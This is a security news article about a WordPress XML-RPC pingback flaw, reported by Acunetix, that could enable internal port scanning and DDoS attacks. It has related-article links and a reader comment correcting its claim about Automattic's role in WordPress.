WordPress Pingback Vulnerability Could Lead to DDoS Attacks

A pingback vulnerability exists in the WordPress blogging platform that could leak information and lead to distributed denial of service (DDoS) attacks if the right script is run, according to web application security firm Acunetix.

A pingback vulnerability exists in the WordPress blogging platform that could leak information and lead to distributed denial of service (DDoS) attacks if the right script is run, according to web application security firm Acunetix.

A pingback is technically something blog owners rely on to track who and what is linking to their posts. When WordPress processes each pingback, the blog resolves the source URL and usually posts a comment that each blog entry has been referenced.

According to Acunetix’s Bogdan Calin, this particular vulnerability is exploitable through the platform’s XMLRPC API (through XMLRPC.PHP). Attackers could try and guess hosts inside each network they target, port scan those hosts, reconfigure internal routers and launch large scale DDoS attacks.

The vulnerability is being carried out autonomously by a new tool currently distributed on the software development site Github. That tool exposes the API and lets attackers scan other hosts, multiple WordPress blogs and with a specialized URL, reconfigure routers.

The flaw was first brought to WordPress’ attention more than six years ago in April 2007 but a ticket for the flaw was closed when a developer with the company claimed he wasn’t sure it was worth bothering with, adding then that there are “so many ways to orchestrate a DDoS.”

Calin notes that while there isn’t a fix for the vulnerability, the flaw has once again been brought to WordPress’ attention. The blog entry adds that even disabling pingbacks and trackbacks on blogs won’t fix the problem, so it seems a patch is inevitable at this point.

Automattic, the makers of WordPress, has experienced its fair share of security bugs in 2012. Automatic update malware was found infecting blogs in May, a handful of bogus themes left blogs open to cross-site scripting (XSS) attacks in October while just last week, WordPress sites, along with Joomla sites, were being targeted by iFrame injection attacks.

Suggested articles

ThreatList: Latest DDoS Trends by the Numbers

Trends in DDoS attacks show a evolution beyond Mirai code and point to next-gen botnets that are better hidden and have a greater level of persistence on devices – making them “far more dangerous.”

bit and piece ddos attack

Bit-and-Piece DDoS Method Emerges to Torment ISPs

Perpetrators are using smaller, bit-and-piece methods to inject junk into legitimate traffic, causing attacks to bypass detection rather than sounding alarms with large, obvious attack spikes.

Discussion

  • Andrea_R on

    "Automattic, the makers of WordPress"

    This is incorrect. Wordpress.org is an open source project.

    Automattic the company uses the sofware for the wordpress.com *service*. 

    While some Automattic employees contribute to the WordPress codebase, they do not control or own it outright. They do no teven own the trademark - the WP Foundation does.

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.